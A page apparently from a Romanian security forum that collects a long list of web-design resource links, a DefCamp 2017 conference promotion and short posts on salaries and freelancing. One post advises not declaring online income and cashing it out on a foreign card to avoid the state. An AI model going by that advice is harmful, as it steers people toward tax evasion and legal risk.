    Color Scheme Generator http://wellstyled.com/tools/colorscheme2/index-en.html Color Blender Tool http://www.meyerweb.com/eric/tools/color-blend/ Top Color Combinations Graphic Design Tutorials : Graphic Design Software Directory & Portal for Graphics Tips : Desktop Publishing Resources & Graphic Design Links Kuler http://kuler.adobe.com/ Color Contrast Tool Colour Check - Etre Visibone’s Color Lab VisiBone Webmaster's Color Lab I like Your Colors Tool http://www.redalt.com/Tools/ilyc.php Pantone and Hexidecimal Colour Chart http://www.unimelb.edu.au/webcentre/tools/developertools/pantone.html Advanced Javascript Color Picker http://www.softpedia.com/get/Internet/WEB-Design/Web-Design-related/Advanced-Javascript-color-picker.shtml Color Combinations Color combinations - Cure for designers block Color Combo http://www.colorcombo.com/ Color Combos Color Combinations | Color Schemes | Color Palettes Color Library http://www.colorcombos.com/combolibrary.html Color Schemer http://www.colorschemer.com/online.html Web Color Schemes http://www.returnofdesign.com/colors/ Color Lovours http://www.colourlovers.com/ Lynda Weinman’s Browser-Safe Colors Organized By Hue http://www.websitetips.com/designer/colors1.html Lynda Weinman’s Website Tips For Designers: Browser-Safe Colors Organized By Value (Lights and Darks) Web Design, Development Resources - HTML Tutorials, CSS, Web Design Articles, Web Page Design, Web Design Tips, Fonts, Articles, Tutorials, HTML - Web Site Resources, Website Tips - WebsiteTips.com Visibone’s Swatch Collections http://www.visibone.com/swatches/ WEB DESIGN RESOURCES DIRECTORY http://www.allgraphicdesign.com/ Graphic Design Resources http://www.allwebdesignresources.com// Web Design Resources http://www.a2zwebdesignsource.com/ A2Z Web Design Resources http://www.bestcatalog.net/ Best Catalog http://www.hooverwebdesign.com/resources/ Hoover Web Design http://www.webmasteredge.com/ Webmaster Edge WEB DESIGN / GRAPHIC DESIGN FORUMS http://www.allgraphicdesign.com/phpBB2/ Graphic Design Forums http://www.openwebdesign.org/forum/ Open Web Design Forum http://www.webmasterworld.com/ WebmasterWorld http://www.webdevforums.com/ Web Dev Forum http://www.webdesignforum.com/ Web Design Forum http://webdesignforums.net/ Web Design Forums http://www.graphicdesignforum.com/ Graphic Design Forum http://www.graphic-design-forum.com/ Graphic-Design-Forum http://www.steeldolphin-forums.com/ Steel Dolphin Forum FREE TEMPLATES SITES AND DESIGN http://mashable.com/2007/09/29/2-column-website-templates/ 80 Free 2 Column Templates – Mashable http://mashable.com/2007/09/13/one-column-website-templates/ 40 Free 1 Column Templates – Mashable http://mashable.com/2007/10/11/free-3-column-web-templates/ 30 Free 3 Column Templates – Mashable http://www.101webtemplate.com/ 101WebTemplates http://www.adesdesign.net/php/templates.php Ades Design http://gerlinda.com/templates.shtml All-in-one Website Templates and hosting packages http://templates.arcsin.se/ CSS Design Templates http://www.designload.net/ Design Load http://www.htmlcenter.com/tutorials/tutorials.cfm/64 Dreamweaver Templates Tutorial http://www.elated.com/pagekits/ Elated Web Page Kits (Templates) http://mitchbryson.com/css-templates/ Free Basic CSS Templates http://www.freelayouts.com/ Free Layouts http://freesitetemplates.com/ Free Site Templates http://www.templatemuseum.com/ Free Templates & Web Designing http://www.freewebtemplates.com/ Free Web Templates http://www.freewebsitetemplates.com/ Free Web Site Templates http://www.graphic-templates.com/ Graphic Templates http://web.thenetter.com/ TheNetter.com Web Design http://www.mycelly.com/ MyCelly Free CSS Templates http://myfreetemplatehome.com/ My Free Template Home http://www.opendesigns.org/ Open Design Community http://www.oswd.org/ Opensource Web Design Templates http://www.opensourcetemplates.org/ Opensource Templates http://www.smartwebby.com/website_templates/default.asp Professional Dreamweaver Templates http://www.studio7designs.com/open_source_templates.cfm Studio 7 Opensource Templates http://www.templatehunter.com/ Template Hunter http://www.templatesbox.com/ Templates Box http://templates2go.com/ Templates to Go http://www.templateyes.com/ Template Eyes http://www.templates-themes-graphics.com/ Templates Theme Graphics http://www.templatemonster.com/ Template Monster http://www.templateworld.com/free_templates.html Template World http://www.webpagedesign.com.au/ Web Page Design Templates AU http://www.zeroweb.org/ Zero Web WEB DESIGN INSPIRATIONAL SITES http://brandsoftheworld.com/ Brands of the World http://www.dotcomlogotypes.com/main/main.php Dot Com Logotypes http://www.123-logo-logos.com/logo-designs.htm How to Design a Logo http://logotypes.designer.am/ Free LogoTypes http://www.goodlogo.com/ Good Logo http://gopromos.com/idea_center/stock_art_alpha.asp Go Promos http://www.logoed.fsnet.co.uk/index2.html Logoed http://www.ideabook.com/progress.htm Logo in Process http://logomarket.com/ Logomarket.com http://www.logotypes.ru/ Logotypes Russia http://www.basa.md/logo/ LogoTypes from Maldolva http://www.logotypes.lv/ Logotypes http://www.satlogo.com/ Satlogo.com http://www.sportlogo.net/ Sport Logos WEB SITE RATINGS & INFORMATION http://www.alexa.com/ Alexa http://blogoscoped.com/rank/ Any Rank http://blogoscoped.com/archive/2005-01-29-n34.html Blogoscoped http://www.golexa.com/ GoLexa Google Toolbar for Firefox – Google Toolbar Google Toolbar http://greatdb.com/ GreatDB http://www.rankquest.com/download-toolbar.html RankQuest Toolbar http://www.seo-browser.com/ SEO Browser http://tools.seobook.com/firefox/seo-for-firefox.html SEO Open for Firefox http://tools.seobook.com/firefox/seo-for-firefox.html SEO Toolbar for Firefox http://www.seotoolset.com/tools/toolbar.html SEO Toolbar http://www.wmtips.com/tools/info/ Site Information http://www.toolbarbrowser.com/ Toolbar Browser http://www.urltrends.com/ URL Trends http://www.websitegrader.com/ WebSite Grader KEYWORDS TOOLS FOR SEO http://www.goodkeywords.com/ Good Keywords https://adwords.google.com/select/KeywordToolExternal Google Adwords Keyword External Tool Google Trends Google Trends http://freekeywords.wordtracker.com/ Free Keyword Suggestion Tool http://www.keyworddiscovery.com/ Keyword Discovery http://www.digitalpoint.com/tools/suggestion/ Digital Point Keyword Suggestion Tool http://developers.evrsoft.com/seotool/ SEO Keyword Optimization Tool http://www.wordze.com/ Wordze SEARCH ENGINE OPTIMIZATION / SEO SITES http://www.thirtydaychallenge.com/ 30 Day Challenge http://www.seocompany.ca/tool/seo-tools.html 136 SEO Tools http://www.robotstxt.org/wc/active/html/ Database of Web Robots http://www.modernlifeisrubbish.co.uk/article/click-survey-heatmap-analysis Click Survey Analysis & Heatmap http://www.vaughns-1-pagers.com/internet/google-ranking-factors.htm Google Ranking Factors http://www.jimwestergren.com/link-bait/ Link Bait http://www.mattcutts.com/blog/ Matt Cutts http://www.highrankings.com/forum/ Search Engine Optimization Forum http://searchenginewatch.com/ Search Engine Watch http://www.seobook.com/ SEO Book http://www.seoegghead.com/blog/seo/mattcuttsarama-a-summary-of-useful-stuff-matt-cutts-has-said-p112.html SEO Egghead http://www.seomoz.org/ SEOMoz http://www.seroundtable.com/ SEO Roundtable http://www.webmasterworld.com/ Webmasters World WEB DESIGN INSPIRATION AND WEB DESIGN IDEAS http://www.thebestdesigns.com/ Best Designs http://www.brainfuel.tv/ Brain Fuel http://www.coolestdesigns.com/ Coolest Designs http://www.coolhomepages.com/ Cool Home Pages http://www.digitalrefueler.com/ Digital Refueler http://www.digitalthread.com/vintage/ Digital Thread http://www.thedreamer.com.br/ Dreamer http://www.internettinyawards.com/ Internet TINY Awards http://www.misspato.com/ Misspato http://www.moluv.com/ Moluv http://www.newstoday.com/ Newstoday http://nofound.com/home/ No Found http://www.nolimitmedia.com/ No Limit Media http://www.plasticpilots.com/ Plastic Pilots http://www.visualdesigner.net/home/ Visual Designer FREELANCE WEB DESIGN JOBS http://www.allfreelancework.com/ All Freelance Work (non bidding jobboard so cuts down on foreign competition) http://www.contractedwork.com/ Contracted Work http://www.elance.com/ Elance http://www.12freelance.com/ 12Freelance http://gigs.37signals.com/ 37 Signals http://www.agaveblue.net/ Agave Blue http://www.aquent.com/ Aquent (recruiting agency for freelancers) http://www.adveres.com/ Adveres http://authenticjobs.com/ Authenic Jobs http://www.bid-job.com/ Bid-Job http://www.bidradar.com/ Bid Radar http://www.careerbuds.com/ CareerBuds http://www.craigslist.org/ CraigsList http://www.ework.com/ eWork http://www.facebook.com/ FaceBook http://www.freelanceauctionnetwork.com/ Freelance Auction Network http://www.freelancebank.com/ Freelance Bank http://www.freelancebbs.com/ Freelance BBS http://www.freelancecenter.com/ Freelance Center http://www.freelancers.net/ Freelancers.net http://www.thefreelancehub.com/ Freelance Hub http://www.freelancejobsearch.com/ Freelance Job Search http://www.freelancejobs.org/ FreelanceJobs.Org http://www.freelancejobspost.com/ Freelance Jobs Post http://www.freelance-work.net/ Freelance-Work http://www.freelance.com/ Freelance.com http://www.freelancegroups.com/ Freelance Groups (For Christians) http://www.freelancemom.com/gigs.htm Freelance Mom http://www.freelanceireland.ie/ Freelance Ireland http://www.freelanceindia.com/ Freelance India http://www.freelancequotes.com/ Freelance Quotes http://www.freelanceq.com/ FreelanceQ http://jobsandgigs.com/ Jobs and Gigs http://www.linkedin.com/ LinkedIn http://www.noagenciesplease.com/ No Agencies Please http://www.odesk.com/ ODesk http://www.project4hire.com/ Project4Hire http://www.smarterwork.com/ Smarterwork http://www.sologig.com/ SoloGig http://www.thecentralmall.com/index.html The Central Mall http://www.totalfreelance.com/ Total Freelance http://www.trally.com/ Trally (translation jobs) http://www.woompa.com/ Woompa http://www.workatnight.com/ Work at Night WEB DESIGN SPECIFIC FREELANCE SITES http://cgilance.com/main.html CGI Lance http://www.cityitjobs.net/ City IT Jobs http://www.codelance.com/ Code Lance http://www.coderforrent.com/ Coder for Rent http://www.coroflot.com/ Coroflot (Designers) http://www.coswap.com/ Creative Freelance Web Designer Marketplace http://www.designquote.net/ Design Quote: Where web designers and web design projects meets. http://www.developreneurs.com/ Developreneurs http://www.developerbids.com/ Developer Bids http://www.devbistro.com/ Dev Bistro http://www.e-globalsolutions.com/ e-Global Solutions http://www.freelanceauction.com/ Freelance Auction http://www.freelancecentral.net/ Freelance Central http://www.freelancedesigners.com/ Freelance Designers http://www.freelancewebprojects.com/ Freelance Web Projects http://freelanceseek.com/ Freelance Seek http://jobs.freelanceswitch.com/ Freelance Switch http://devbistro.com/index.jsp Freelance Web Developer http://www.freelancewebprogramming.com/ Freelance Web Programming http://www.freshwebjobs.com/ Fresh Web Jobs http://jobs.gawker.com/newmediajobs Gawker Internet / New Media Jobs http://www.geekbidder.com/ Geek Bidder http://www.getafreelancer.com/ Get a Freelancer http://www.gurulance.com/ GuruLance http://www.hirecoders.com/ Hire Coders http://www.artypapers.com/jobpile/ Job Pile http://www.krop.com/ Krop (creative and tech jobs) http://www.listbid.com/ List Bid http://www.nyfreelancers.com/ NY Freelancers http://www.outsourcetoday.net/ Outsource Today http://www.oslance.com/ OsLance http://www.php-freelancers.com/ PHP Freelancers http://www.phpquote.net/ PHP Quote http://www.planetrecruit.com/ Planet Recruit http://www.projectspool.com/ Project Pool http://www.projectspring.com/freelance/index.html ProjectSpring http://rfq.programmingbids.com/ Programming Bids http://www.programmingoutpost.com/ Programming Outpost http://www.project4hire.com/ Project4Hire http://www.projectsimple.com/ Project Simple http://www.freelancefree.com/ Freelance Free http://r144.com/workshop.htm Freelance Job News http://www.freelanceyourproject.com/ Freelance Your Project http://www.guru.com/ Guru.com http://www.hirebid.com/ HireBid http://www.ifreelance.com/ iFreelance http://www.joomlafreelance.co.uk/ Joomla Jobs http://www.joomlancers.com/ Joomlancers http://www.lancesite.com/ Lance Site http://ct.monster.com/ Monster (Monster has a Contract and Temporary Work section) http://www.noagenciesplease.com/ No Agencies Please http://www.freelancedirectory.org/ NUJ Freelance Direct http://www.projectlance.com/ ProjectLance http://www.prosavvy.com/ ProSavvy http://www.rentacoder.com/RentACoder/default.asp Rentacoder http://www.scriptalliance.com/ Script Alliance http://www.scripthelpers.com/ Script Helpers http://www.scriptplaza.com/ Script Plaza http://www.snaplance.com/ SnapLance http://www.sologig.com/ Sologig http://www.supportuniverse.com/ Support Universe http://www.templatelance.com/ TemplateLance http://www.webprojobs.com/ Web Pro Jobs http://www.webwalas.com/ Web Walas FREE STOCK PHOTOGRAPHY SITES http://www.amgmedia.com/freephotos/ AMG Media http://www.artfavor.com/ Art Favor http://www.ars.usda.gov/is/graphics/photos/ ARS Image Gallery http://amazingtextures.com/textures/index.php Amazing Textures http://www.burningwell.org/ Burning Well http://www.bigfoto.com/ Big Foto http://www.buzznet.com/ Buzz Net http://www.barrysfreephotos.com/ Barry’s Free Photos – Free Stock Photos http://www.creatingonline.com/stock_photos/ Creating Online http://www.cepolina.com/freephoto/ Cepolina http://search.creativecommons.org/ Creative Commons Search http://gimp-savvy.com/PHOTO-ARCHIVE/ Copyright Free Photo Archive http://gallery.hd.org/index.jsp DHD Multimedia Gallery http://www.free-photographs.net/ Free Photographs http://www.freedigitalphotos.net/ Free Digital Photos http://www.freeimages.co.uk/ Free Images and Stock Photos http://www.freephotos.com/ Free Photos Dot Com http://www.freephotosbank.com/ Free Photos Bank http://free-stockphotos.com/ Free Stock Photos Dot Com http://www.freemediagoo.com/ Free Media Goo http://geekphilosopher.com/MainPage/photos.htm GeekPhilosopher http://freestockphotos.com/ Free Stock Photos http://www.freefoto.com/index.jsp Free Foto http://fromoldbooks.org/ From Old Books http://www.holylandphotos.org/ Holy Land Photos http://davidniblack.com/imagebase/ Image Base http://www.imageafter.com/ Image After http://build.tripod.lycos.com/imagebrowser/photos/index.html Lycos Image Gallery http://www.morguefile.com/ Morgue File http://majesticimagery.com/ Majestic Imagery http://www.pics4learning.com/ Pics4Learning http://www.pixelperfectdigital.com/ Pixel Perfect Digital http://pdphoto.org/ PD Photo http://www.photorogue.com/ Photo Rogue http://www.pixelbag.de/ PixelBag http://www.photocase.com/ PhotoCase http://www.picturestation.net/start/ Picture Station http://www.piotrpix.info/ Piotr.Pix http://www.sxc.hu/ Stock Xchng http://www.stockvault.net/ Stock Vault http://www.unprofound.com/ UnProfound http://www.visipix.com/index_hidden.htm Visipix http://www.woophy.com/ Woophy http://www.nps.gov/yell/press/images/ Yellowstone National Park http://yotophoto.com/ YotoPhoto http://www.nwyhstockimages.com/ NWYH Stock Image Library http://www.openphoto.net/ Open Photo http://stockcache.com/gallery/ Stockcache Gallery http://www.vintagepixels.com/ Vintage Pixels http://commons.wikimedia.org/ Wikimedia http://wallpaperstock.com/ Wallpaper Stock PORTFOLIO SITES http://www.allfreelancework.com/ AllFreelanceWork.com http://altpick.com/ AltPick.com http://www.deviantart.com/ DeviantArt http://www.graphicdesigncommunity.com/ Graphic Design Community http://www.portfolios.com/ Portfolios.com DESIGN MAGAZINES http://www.arkitip.com/ Arkitip http://www.pagelab.com/ Before & After http://www.digital-web.com/ Digital Web http://www.bigmagazine.com/home.htm Big Magazine http://coupe-mag.com/ Coupe Mag http://www.digitaloutput.net/ Digital Output http://www.graphis.com/ Graphis http://www.alistapart.com/ A List Apart http://www.pagelab.com/ Before & After http://www.bornmag.com/ Born Magazine http://www.brigataitalia.com/ Brigata http://www.creativebehavior.com/ Creative Behavior http://www.creativebusiness.com/newsletter.lasso Creative Business Newsletter http://www.delvemagazine.com/ Delve Magazine http://www.digitaloutput.net/ Digital Output http://digitalproducer.digitalmedianet.com/ Digital Producer Magazine http://venturalady.com/html/vuepoint.html VUEPOINT Magazine (On Amazon.com) Titles .net : The Internet Magazine Inside Web Design How Magazine Communication Arts Dynamic Graphics Magazine Layers Magazine Computer Arts C-W Computer Arts Projects Computer Graphics World Digital Arts Magazine Eye – International Review of Graphic Design Step Inside Design Magazine Graphic Communications World Graphic Design – USA Graphic Design Journal I.D. Magazine Novum : World of Graphic Design Digital Graphics Magazine Graphic Arts Monthly Magazine Grafik Professional Magazine Inside Adobe Indesign Magazine / Journal Trade Pub Digital Media World Advanced Photoshop Inside Photoshop Magazine Photoshop Creative Magazine Photoshop Elements Techniques Magazine Better Photoshop Techniques Magazine Grafik Student Magazine DESIGN MAGAZINES ONLINE http://www.gxo.com/ Graphic Exchange http://www.graphis.com/ Graphis http://www.netdiver.net/ Net Diver http://www.fontsite.com/ FontSite http://www.pingmag.jp/ Pink Mag http://www.guuui.com/ GUUUI FREE FONTS SITES http://new.myfonts.com/WhatTheFont/ WhatTheFont http://www.1001freefonts.com/ 1001 Free Fonts http://www.1001fonts.com/ 1001 Fonts http://www.2200freefonts.com/ 2200 Free Fonts http://www.1archive.com/ 1 Archive Fonts http://www.4yeo.com/freefonts/index.htm 4Yeo http://www.a1fonts.com/html/Letter_A,0.htm A1 Fonts http://desktoppub.about.com/od/freefonts/ About.com Free Fonts http://www.abstractfonts.com/ Abstract Fonts http://www.abcwebworx.com/fonts/ ABCWebWorx http://www.grsites.com/fonts/ Absolute Fonts Archive http://www.graphicsngraphicdesign.com/hugelistfreefontssites Huge list of free fonts here…. TUTORIALS SITES http://www.tutorialselect.com/ Tutorials Select http://www.pixel2life.com/ Pixel2Life http://www.goodtutorials.com/ Good Tutorials http://www.totaltutorial.com/ Total Tutorials http://www.tutorialoutpost.com Tutorial Outpost http://www.tutorialquest.com/ Tutorial Quest http://www.w3schools.com/ W3 Schools BLOG HOSTS AND SERVICES https://www.blogger.com/start Blogger http://www.livejournal.com/ LiveJournal http://multiply.com/ Multiply http://www.opendiary.com/ Open Diary http://www.squidoo.com/ Squidoo http://www.tumblr.com/ Tumblr http://twitter.com/ Twitter http://www.typepad.com/ TypePad http://wordpress.com/ WordPress COMMUNITY / CMS SOFTWARE http://www.drupal.org/ Drupal http://elgg.org/ Elgg http://www.joomla.org/ Joomla http://www.mamboserver.com/ Mambo http://radiantcms.org/ Radiant CMS http://typo3.org/ Typo 3 http://www.boonex.com/products/dolphin/ Boonex Dolphin FORUM / MESSAGE BOARD SOFTWARE http://www.phpbb.com/ PHPBB http://www.invisionpower.com/ Invision Power http://www.simplemachines.org/ Simple Machines http://forum.snitz.com/default.asp Snitz http://www.phorum.org/ Phorum http://www.punbb.org/ PunBB http://www.webwizguide.info/web_wiz_forums/default.asp WebWiz http://www.wowbb.com/ WowBB http://www.ubbcentral.com/ UBB http://getvanilla.com/ Vanilla http://www.vbulletin.com/ VBulletin WEB DESIGN BLOGS http://www.allwebdesignresources.com/webdesignblogs/ Web Design Resources Blog http://www.456bereastreet.com/ 456 Berea Street http://www.andybudd.com/ Andy Budd http://www.alistapart.com/ A List Apart http://andreasviklund.com/ Andreas Vilkund http://www.bartelme.at/journal/ Bartelme Design http://bittbox.com/ Bitt Box http://www.briangardner.com/ Brian Gardner http://www.cssbeauty.com/ CSS Beauty http://fadtastic.net/ Fadtastic http://www.allgraphicdesign.com/graphicsblog/ Graphic Design & Graphics News Blog http://meyerweb.com/ Meyer Web http://www.pearsonified.com/ Pearsonified http://www.snook.ca/jonathan/ Snook http://www.simplebits.com/ Simple Bits http://www.sitepoint.com/blogs/category/design/ SitePoint http://www.smashingmagazine.com/ Smashing Magazine http://theundersigned.net/ Undersigned http://www.thinkvitamin.com/ Vitamin http://warpspire.com/ Warpspire http://www.webdesignerwall.com/ Web Designer Wall WEB HOSTING REVIEWS AND DIRECTORIES http://www.filehostingreview.com/ File Hosting Review http://www.webhostingjury.com/ Web Hosting Jury http://www.webhostingunleashed.com/ Web Hosting Unleashed http://www.hostindex.com/web/hostexcellence/host_excellence_reviews.shtm Host Excellence http://www.reviewwebhosts.com/ Review Web Hosts http://www.powerreviews.com/ Power Reviews http://www.websitehostingreviews.com/ Web Site Hosting Reviews ADVERTISING https://www.google.com/adsense/ Google Adsense http://www.adbrite.com/ AdBrite http://www.adengage.com/ Adengage http://www.bidclix.com/ BidClix http://www.bidvertiser.com/ Bidvertiser http://www.clicksor.com/ Clicksor http://www.text-link-ads.com/ Commission Junction http://www.compactads.com/ Compact Ads http://www.interclick.com/ InterClick http://www.kontera.com/ Kontera http://kanoodle.com/ Kanoodle http://partnerweekly.com/ Partner Weekly http://www.peakclick.com/ PeakClick http://www.text-link-ads.com/ TextLinkAds http://www.valueclick.com/ ValueClick http://publisher.yahoo.com/ Yahoo Publisher WEB DESIGN / DEVELOPMENT LIBRARIES http://weblogs.asp.net/mschwarz/archive/2005/04/07/397504.aspx AJAX http://redredmusic.com/brendon/ajform/ AJForm http://www.ajaxgear.com/ Ajax Gear https://developer.berlios.de/projects/bajax/ Bajax http://bennolan.com/behaviour/ Behaviour http://www.colorcombos.com/combolibrary.html Color Combos http://cpaint.booleansystems.com/ CPaint http://www.cross-browser.com/toys/ Cross Browser Toys http://www.dhtmlgoodies.com/ DHTML Libraries http://www.dojotoolkit.org/ Dojo http://www.youngpup.net/2001/domdrag/ DOM Drag http://www.walterzorn.com/dragdrop/dragdrop_e.htm Drag and Drop http://www.dynamicdrive.com/style/ Dynamic Drive CSS Library http://www.imnmotion.com/projects/engine/ Engine http://www.walterzorn.com/jsgraphics/jsgraphics_e.htm Javascript Vector Graphics http://www.mochikit.com/ Mochikit http://moofx.mad4milk.net/ Moo.FX http://www.bosrup.com/web/overlib/ OverLib http://pear.php.net/ Pear http://www.plextk.org/ Plex Toolkit http://prototype.conio.net/ Prototype http://qooxdoo.oss.schlund.de/ Qooxdoo http://openrico.org/rico/home.page Rico http://twilightuniverse.com/projects/sack/ Sack http://sarissa.sourceforge.net/doc/ Sarissa http://script.aculo.us/ Script.aculo.us http://sourceforge.net/projects/solvent/ Solvent http://swat.silverorange.com/Swat Swat http://www.technicalpursuit.com/ajax.htm Tibet http://www.dotvoid.com/view.php?id=40 Toxic http://developer.yahoo.com/yui/ Yahoo UI Library http://www.zimbra.com/ Zimbra TOP CSS TOOLS blueprintcss - Blueprint: A CSS Framework - Google Project Hosting BluePrint CSS http://www.somacon.com/p334.php CSS Fonts and Text Library Tool http://www.dynamicdrive.com/style/ Dynamic Drive CSS Library http://www.cssdrive.com/index.php/main/csscompressor/ CSS Compression http://www.cssoptimiser.com/ CSS Optimizer http://csstidy.sourceforge.net/index.php CSS Tidy http://www.csscreator.com/version2/pagelayout.php CSS Creator http://riddle.pl/emcalc/ CSS Pixel Font Sizes Tool http://www.accessify.com/tools-and-wizards/accessibility-tools/form-builder/ CSS Accessible Form Builder Tool http://www.maketemplate.com/form/ CSS Form Code Maker http://www.neuroticweb.com/recursos/css-rounded-box/ CSS Rounded Box Generator http://www.collylogic.com/scripts/rollover.html CSS Rollover Generator http://typetester.maratz.com/ CSS Typetester http://www.sitevista.com/cssvista/ CSS Vista http://www.highdots.com/css-list/index.php HightDots Tabs CSS Generator http://www.redalt.com/Tools/ilyc.php I Like Your Colors from Redalt http://www.korhoen.net/css_typeviewer.html Korhoen CSS Typeviewer http://www.maketemplate.com/ Make Template CSS Tool http://www.accessify.com/tools-and-wizards/developer-tools/list-o-matic/ Navigational CSS Menu Generator http://www.positioniseverything.net/articles/pie-maker/pagemaker_form.php Position Is Everything http://www.iconico.com/CSSScrollbar/ Scrollbar Color Changer http://www.s5easy.com/ Slideshow Creator http://www.scriptomizers.com/css/stylesheet_generator Stylesheet Generator http://www.wannabegirl.org/firdamatic/ Tableless Layout Generator http://www.ibdjohn.com/csstemplate/ Template Code Generator Technorati Tags: http://technorati.com/tag/web+design+tools web design tools http://technorati.com/tag/design+tools design tools http://technorati.com/tag/web+design+resources web design resources http://technorati.com/tag/top+web+design+tools top web design tools http://technorati.com/tag/top+web+design+resources top web design resources http://technorati.com/tag/css css http://technorati.com/tag/colors colors http://technorati.com/tag/toolkit toolkit http://technorati.com/tag/tools tools http://technorati.com/tag/templates templates http://technorati.com/tag/free+templates free templates http://technorati.com/tag/css+tools css tools http://technorati.com/tag/color+pickers color pickers http://technorati.com/tag/color+choosers color choosers http://technorati.com/tag/css+resources css resources http://technorati.com/tag/web+design+forums web design forums http://technorati.com/tag/design+forums design forums http://technorati.com/tag/cms+software cms software http://technorati.com/tag/free+photos free photos http://technorati.com/tag/free+photographs free photographs http://technorati.com/tag/free+images free images http://technorati.com/tag/free+fonts free fonts http://technorati.com/tag/list+of+fonts list of fonts http://technorati.com/tag/inspiration+sites inspiration sites http://technorati.com/tag/web+design+inspiration web design inspiration http://technorati.com/tag/seo+tools seo tools http://technorati.com/tag/search+engine+optimization+tools search engine optimization tools http://technorati.com/tag/seo seo http://technorati.com/tag/search+engine+optimization search engine optimization http://technorati.com/tag/web+design+jobs web design jobs http://technorati.com/tag/job+sites job sites http://technorati.com/tag/freelance+job+sites freelance job sites http://technorati.com/tag/freelance+job+boards freelance job boards http://technorati.com/tag/portfolio+sites portfolio sites http://technorati.com/tag/free+portfolios free portfolios http://technorati.com/tag/stock+photograph stock photograph http://technorati.com/tag/blog+hosts blog hosts http://technorati.com/tag/blog+services blog services http://technorati.com/tag/server+review+sites server review sites http://technorati.com/tag/host+review+sites host review sites http://technorati.com/tag/web+design+directories web design directories http://technorati.com/tag/design+directories design directories
  42. 5 points
  43. 5 points
  44. 5 points
    See you in November at DefCamp 2017 Want to experience a conference that offers outstanding content infused with a truly cyber security experience? For two days (November 9th-10th) Bucharest will become once again the capital of information security in Central & Eastern Europe hosting at DefCamp more than 1,300 experts, passionate and companies interested to learn the “what” and “how” in terms of keeping information & infrastructures safe. Now it’s getting really close: this year's conference is only months away, and that means very early bird tickets are now available. Register Now at DefCamp 2017 (50% Off) What can you expect from the 2017 edition? 2 days full of cyber (in)security topics, GDPR, cyber warfare, ransomware, malware, social engineering, offensive & defensive security measurements 3 stages hosting over 35 international speakers and almost 50 hours of presentations Hacking Village hosting more than 10 competitions where you can test your skills or see how your technology stands 1,300 attendees with a background in cyber security, information technology, development, management or students eager to learn How to get involved? Speaker: Call for Papers & Speakers is available here. Volunteer: Be part of DefCamp #8 team and see behind the scene the challenges an event like this can have. Partner: Are you searching opportunities for your company? Become our partner! Hacking Village: Do you have a great idea for a hacking or for a cyber security contest? Consider applying at the Hacking Village Call for Contests. Attendee: Register at DefCamp 2017 right now and you will benefit of very early bird discounts. Register Now at DefCamp 2017 (50% Off) Use the following code to get an extra 10% discount of the Very Early Bird Tickets by June 27th. This is the best price you will get for 2017 edition. Code: DEFCAMP_2017_VEB_10 Website: https://def.camp/
  45. 5 points
    Cred ca numele este de vina, Romanian Security Team... Intr-adevar numele forumului induce in eroare ar trebuii sa fie Romanian Security mai putin in ultimul timp Team, sau Romanian Security unde? pentru ca 80% din posturi is despre conturi pe facebook si cateodata niste intrebari de programare, Team.
  46. 5 points
  47. 5 points
    Ce sa declari in Romania, iubire vesnica ? Nu declari nimic la nimeni. Daca ai treaba online, incasezi pe paypal si scoti pe un card care sa nu fie facut in Romania. Totul depinde de ce si cum vrei sa faci. Aia cu felia groasa este eronata. Defapt, din ce muncesti, iti ramane si tie o felie iar restul iti ia statul. :))))
  48. 5 points
    Nu imi aduc aminte sa fi dat 10 lire (50 RON) pe o bere aici in tara. Nici un abonament lunar la metrou nu cred ca este 13 lire. Cat despre chirie, gasisem apartament cu doua camere (1 flat room sau cum ii zic ei, nu mai stiu) cu 1200 lire (1300 EUR) in zona 8. Cu banii astia stau in penthouse pe Dorobanti.
  49. 5 points
    Sunt multe joburi ok pt absolventii de liceu. Eu am facut suport tehnic in Orange (prin telefon, call center) si am invatat o gramada de lucruri pana am invatat programare la un nivel decent la care sa ma pot angaja ca junior. Sunt iarasi firme care angajeaza oameni pe suport tehnic cu cunostinte de baza de sql (nu te intreaba mai mult de join-uri). Sunt o pista foarte buna de lansare.
  50. 5 points
    Stiu cazuri reale de salarii de minim 1000 de euro lunar, in cluj. Multe. Oameni care abia au inceput facultatea. Eu am avut salariul asta pe clasa a 12 a E simplu. 1. Freelancing, pana reusesti sa ai minim 200 de ore lucrate pe $15-20 / ora . Pe oDesk, Elance sau Freelancer. Sau te angajezi pe salariul de incepator pana faci experienta, doar ca daca vrei sa cresti acelerat, freelancing. 2. Profil de github, cu proiecte cu cod in ele. Majoritatea firmelor mari se uita la detaliile astea. 3. Profil de linkdin complet. 4. MVC / OOP ar trebui sa fie lucruri atat de normale, incat le-ai cataloga direct programare, PHP 4 ar trebui sa fie un banc pentru tine. 5. Eu am lucrat luni intregi "moca" la proiecte personale sa invat lucruri noi, ar fi ok sa fie macar un hobby lucrul la proiectele personale, pentru ca alea te fac sa plutesti si sa "fii la zi" 6. Minim 3 - 4 bloguri / newsletters pe care sa le urmaresti sa fii la zi cu technologiile. Acum, hai sa incep sa va explic ceva. Legat de firmele mari. Calculele urmatoarea is facute la Senior Developer level, in Romania. O firma mare factureaza in jur de 15 - 25 de euro pe ora. ( Realistic vorbind, si asta se intampla in general ) Asta inseamna ca tu daca lucrezi la ei 160 de ore ( 40 * 4 ), le aduci un venit in jur de 2400 - 4000 euro. Realistic vorbind, acum ei isi permit sa te platesca cu 1 - 2000 de euro, si hai sa-ti explic de ce. - Bug Fixing, clar apare, si clientul deobicei NU e facturat pentru asa ceva, in caz ca ai fost "prala", obosit, sau pur si simplu nu ti-ai dat seama de bug, trebuie sa lucrezi probabil cateva ore sa le repari. - Poate nu ai proiect pentru 1 saptamana, chiar daca stai la birou si joci Minecraft / Pirate Kings / Facebook / 9GAG, tot iti iei salariul, siguranta asta trebuie sa vina de undeva. - Poate sunt mai multe proiecte deschise care sunt aproape gata si e ziua salariului, si firma cum e seriosa te plateste la timp. - Spatiul - Curent - Internet. Acum, o firma te plateste in functie de cat esti de important, daca ai pretentii mai mari decat salariul care ti-l ofera cineva, simplu, ti-l faci singur si gata. Partea proasta e, ca ce scriu aici se aplica la foarte putini oameni, pentru ca "povestile" sunt frumoase, dar ca sa ajungi sa ai experienta si faci bani aia, trebuie sa iesi din zona de comfort ( cel putin, daca vrei sa ii faci cand esti ~ 20 ani ). P.S : Am mai vrut sa postez lucrul asta de N ori, dar m-am abtinut, deja m-am saturat de discutiile astea. Orice e posibil + toate lumea are salariul pentru care e dispus sa munceasca. E simplu.